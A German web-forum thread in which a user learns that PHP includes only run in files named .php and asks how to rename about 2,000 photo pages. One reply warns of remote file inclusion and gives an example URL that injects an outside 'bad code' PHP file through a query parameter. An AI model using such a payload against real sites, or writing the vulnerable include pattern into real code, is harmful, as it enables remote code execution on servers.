Einfaches Problem: php-include

• Hallo zusammen,

ich nutze den php-include-Befehl schon lange anstatt Frames. Dort funkioniert er. Aber er funktioniert bei mir nicht, wenn ich in einer Datei eine andere Datei einfügen will. Ob nun HTML oder TXT, es wird nicht eingebunden. Ich muss nur das Prinzip verstanden haben.

Was ich möchte:

Einen Quellcode-Teil einbinden. Testweise einfach einen Satz in Standard-Schritart.
    In 'index.htm' steht in php-Sprache: "binde 'seite.htm' ein". Auch 'seite1.txt' zeigt er in der Datei nicht an. Es ist ein simples Problem, bitte helft mir. Ich habe das ganz kurz in einem Zip-Dok. hochgeladen:

Download

Danke und liebe Grüße
    Tony

PS: Was ich wirklich möchte, ist in einer HTML-Datei wo ein Foto angezeigt wird, eine transparente Fläche drüberlegen. Das funktioniert auch, aber da es viele solcher Foto-HTML-Dateien gibt, möchte ich, dass der Code der transparenten Fläche in einer einzelnen Datei steht. So könnte ich die Aktion "Transparente Fläche" ganz schnell an und wieder abschalten. Aber es reicht mir schon, wenn ich das obere Problem verstehe, denn das ist ja mein Grundproblem.

• du weißt aber schon das

1. include verwendung für diesen zweck nicht sehr sicher ist
    2. PHP Scripte nur ausgeführt werden wenn die datei auch .php heißt ?
    (also einfach index.htm in index.php umbenennen und schon flutscht es)

Apache (der Webserver) gibt datein nur an PHP zum ausführen weiter wenn sie .php heißen. (es sei denn du hast den webserver anders konfiguriert)
    Bedenke aber Punkt 1 meiner liste ...
    Solltest du mit Globals die includes aufrufen, kann jeder x-beliebige alles was er will in die page einschmuggeln.

Jeder hat das Recht dumm zu sein. Einige mißbrauchen dieses Recht leider ständig!
    Weder meine ICQ-Nummer noch meine MSN-Adresse oder meine eMailadresse sind für Bestellungen, Sponsoringanfragen oder Support !

ploppGROUP Internetservices - IT-Partner für Geschäfts-/Großkunden
    mit Rechenzentren in Berlin, Hannover und bald auch FFM

• So sehr kenne ich mich mit PHP nicht aus. Wenn einer so nett wäre und den kleinen Download so umschreiben würde, dass in 'index.htm' eine der andere Seiten (ob nun in .htm, .txt, oder .php) angezeigt wird?

Danke!!

• ICH SACHTE DOCH : einfach index.htm in index.php umbenennen !!!

Wozu da noch was hochladen ?
    Umbenennen wirst du doch was können ?

MfG

Jeder hat das Recht dumm zu sein. Einige mißbrauchen dieses Recht leider ständig!
    Weder meine ICQ-Nummer noch meine MSN-Adresse oder meine eMailadresse sind für Bestellungen, Sponsoringanfragen oder Support !

• Aber noch eine andere Frage: Warum oder besser gesagt, in wie fern ist der include-Befehl nicht sicher? Er funktioniert bei mir seit Jahren einwandfrei.

• Habisch doch gesagt ....

Wenn du ihn mit Gobals (Variablen) benutzt kann man ne menge Schadcode ausführen.

Also wenn du deine Seite aufrufts mit "http://url.tld/?seite=hierdieincludeseite"
    und dann quasi anhand dieser Variable den include setzt, dankann man auch Fremdcode ausführen ...
    ("http://url.tld/?seite=http://…zboesercode.php")

• Rufe dir im Explorer die index.htm auf.
    Rechter Mausclick - Umbenennen
    Ersetze htm durch php

Das war's.
    Jetzt musst du noch beide Dateien (index.php und seite.htm) auf den Webspace hochladen.
    Offline funktioniert das nicht, es sei denn du hast xampp installiert.
    Voraussetzung dass es online funktioniert ist natürlich, dass dein Webpaket PHP-fähig ist.

Achtung: Ggf musst du Menues und Verlinkungen ändern, da die index.htm ja jetzt index.php heißt.

edit: sorry, zu spät, Prob bereits gelöst.

• Danke! Wie oben klein geschrieben, brauche ich das Prinzip für Foto-Seiten. Ich schätze mal 2000. Wie kriege ich denn nun zügig 2000 HTML-Dateien in PHP umbenann?

• Damit : http://toolsandmore.de/Central/Produk…atei-Tools/Joe/

1. Datein hinzufügen in liste
    2. Maske wie folgt ausfüllen : "[NAME].php"

• Hmmm stimmt. sorry

• Konntest Du ja nicht wissen. Dreamweaver kann in Unterordnern suchen, aber leider nur im Quelltext selber und nicht auf die Dateiendungen bezogen. :-/

• Jetzt nochmal zum Verständnis, vielleicht auch zur Lösung deines Problems:
    Die Dateien, die includet werden, können eine beliebige Dateiendung haben.
    Lediglich die Seiten, die den include-Befehl beinhalten müssen mit .php enden.
    Es gibt auch Hoster, wo man einstellen kann, dass auch htm-Dateien geparst werden. Vielleicht hast du ja eine solche Möglichkeit in deinem Webpaket. In diesem Fall könntest du dir die Umbenennung sparen.

• Geht leider nicht. Aber nette Idee. ;)

Ich suche jetzt nach einer anderen Alternative. In viiielen Dokumenten die transparente Grafik an und abschalten... Da fällt mir derzeit nur der include-Befehl ein...

• Ich habe ein paar mal editiert. Mir ist klar, was ihr meint. Aber: Wenn ich 30 Minuten nach einem Beitrag noch mal ne weitere Frage habe und dann meinen letzten Beitrag editiere, merkt keiner mehr, dass ich was neues geschrieben habe. Verstehste? ;)